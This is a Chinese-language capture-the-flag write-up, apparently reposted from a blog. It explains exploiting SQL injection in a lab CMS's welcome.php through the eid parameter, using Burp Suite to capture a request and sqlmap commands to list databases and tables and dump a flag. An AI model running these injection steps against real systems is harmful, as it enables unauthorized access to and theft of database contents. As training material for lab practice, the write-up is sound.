靶场环境：<br />

题目提示了该CMS的welcome.php中存在SQL注入攻击。

CVE官方给出的提示：<br />

welcome.php页面存在SQL注入，并且这个参数是eid

打开靶场环境：<br />

页面是一个登陆注册的界面

用户注册：<br />

1 01@0.com 123456 123456 点击Register(注册） 注册成功

用户登录：<br />

01@0.com 123456 点击Login(登录)

登陆成功：<br />

箭头所指方向存在welcome.php文件但是参数不是eid，而是p 下方有Start开始按钮，点点试试，看看有没有新的发现

<br />

存在了eid参数 由于没有注入窗口，所以想到了，火狐+burpsuite+sqlmap组合拷打

复制带有eid参数的页面网址，用火狐浏览器打开，进行burpsuite抓包<br /><br /><br />创建一个txt文件，将数据包复制到这个txt文件里面<br /><br />注入前的准备工作，了解sqlmap的部分参数

1. -r 加载文件中的HTTP请求（本地保存的请求包txt文件）
2. -D 选择使用哪个数据库
3. -T 选择使用哪个表
4. -C 选择使用哪个列
5. --dbs 列出所有的数据库
6. --batch 自动选择yes
7. --tables 列出当前的表
8. --columns 列出当前的列
9. --dump 获取字段中的数据

启动sqlmap加载flag.txt文件HTTP请求并列出其所有数据库<br />进入到桌面目录下（注意这是我的flag.txt文件保存的位置）<br />执行如下命令：<br />sqlmap -r flag.txt --dbs --batch<br />回显如下：<br /><br />可以看到存在数据库ctf（注意执行命令后，加载可能会慢点，不必慌张。）<br />接下来列出数据库ctf里面的所有数据表<br />执行如下命令：<br />sqlmap -r flag.txt -D ctf --tables --batch<br />回显如下：<br /><br /><br />可以看到数据库ctf里面存在数据表flag，猜测数据表flag里面存在flag（严谨一点）<br />接着爆数据表flag里面的字段<br />执行如下命令：<br />sqlmap -r flag.txt -D ctf -T flag --columns --batch<br />回显如下：<br /><br />数据表flag里面存在字段flag<br />最后爆flag字段里面的内容<br />执行如下命令：<br />sqlmap -r flag.txt -D ctf -T flag -C flag --dump --batch<br />回显如下：<br /><br />得出flag：<br />flag{cdadbe80-6b13-4ce7-bd86-3ff050dd36d3}<br />原文链接：https://blog.csdn.net/m0_73734159/article/details/134083293?spm=1001.2014.3001.5501